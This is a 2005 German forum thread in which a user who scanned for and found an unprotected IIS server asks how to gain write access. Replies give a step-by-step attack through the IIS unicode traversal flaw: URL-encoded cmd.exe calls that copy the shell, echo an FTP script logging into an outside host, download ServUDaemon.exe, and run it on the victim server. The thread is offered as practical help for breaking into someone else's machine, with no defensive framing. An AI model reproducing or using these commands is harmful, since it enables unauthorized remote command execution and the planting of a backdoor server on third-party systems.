IIS echo befehl/schreibrechte

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von n00b123, 20. August 2005 .

Schlagworte:
  1. 20. August 2005
    also ich hab nach iis gescannt und hab nen server ohne firewall gefunden:
    dies ist der unicode:
    Code:
    /d/winnt/system32/cmd.exe
    platte c: kann ich sehn mit:
    Code:
    http://1.2.3.4./d/winnt/system32/cmd.exe?/c+dir+c:
    aber wie geht dass dann mit den schreibrechten bekommen(Superlol.exe???)??

    und wie geht der echo befehl mit diesem script?


    thx for help
    nO0b
     
  2. 21. August 2005
    du musst dir die cmd.exe kopieren mit c+copy+c:\winnt\system32\cmd.exe+c:\irgendeinordner\cmd2.exe

    dann kannst du weitermachen mit der cmd2.exe (die man für den echo befehl braucht)
     
  3. 21. August 2005
    ja danke erstmals das hab ich jetzt in meinem ordner ist die cmd2.exe

    wie ist denn jetzt der echo befehl?

    so in etwa:
    Code:
    http://1.2.3.4./c/meinordner/cmd2.exe?/c+echo+open+ftp.mitglied.lycos.de+21>>c:\meinordner\scr.txt
     
  4. 22. August 2005
    so gehts und nicht anders
    aber bei den meisten servern funkt dann der ftp server nicht, weil es die firewall blockt, also stell den unbedingt auf port 21!

    /winnt/system32/cmd.exe?/c+dir+c:\
    /winnt/system32/cmd.exe?/c+mkdir+c:\TEMP
    /winnt/system32/cmd.exe?/c+copy+c:\WINNT\system32\CMD.EXE+c:\TEMP\cmd2.exe
    /TEMP/cmd2.exe?/c+dir+c:\

    SKRIPT ERSTELLEN
    /TEMP/cmd2.exe?/c+echo+open+ftp.tripod.com+21>>+c:\TEMP\temp.txt
    /TEMP/cmd2.exe?/c+echo+user+USERNAME+PASSWORT>>+c:\TEMP\temp.txt
    /TEMP/cmd2.exe?/c+echo+BINARY>>+c:\TEMP\temp.txt
    /TEMP/cmd2.exe?/c+echo+get+ServUDaemon.exe+c:\TEMP\ServUDaemon.exe>>+c:\TEMP\temp.txt
    /TEMP/cmd2.exe?/c+echo+get+ServUDaemon.ini+c:\TEMP\ServUDaemon.ini>>+c:\TEMP\temp.txt
    /TEMP/cmd2.exe?/c+echo+quit>>+c:\TEMP\temp.txt

    DOWNLOADEN
    /winnt/system32/cmd.exe?/c+ftp+-i+-n+-v+-s:c:\TEMP\temp.txt

    AUSFÜHREN
    /winnt/system32/cmd.exe?/c+c:\TEMP\ServUDaemon.exe
    /winnt/system32/cmd.exe?/c+call+c:\TEMP\ServUDaemon.exe
    /winnt/system32/cmd.exe?/c+start+c:\TEMP\ServUDaemon.exe
     
  5. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.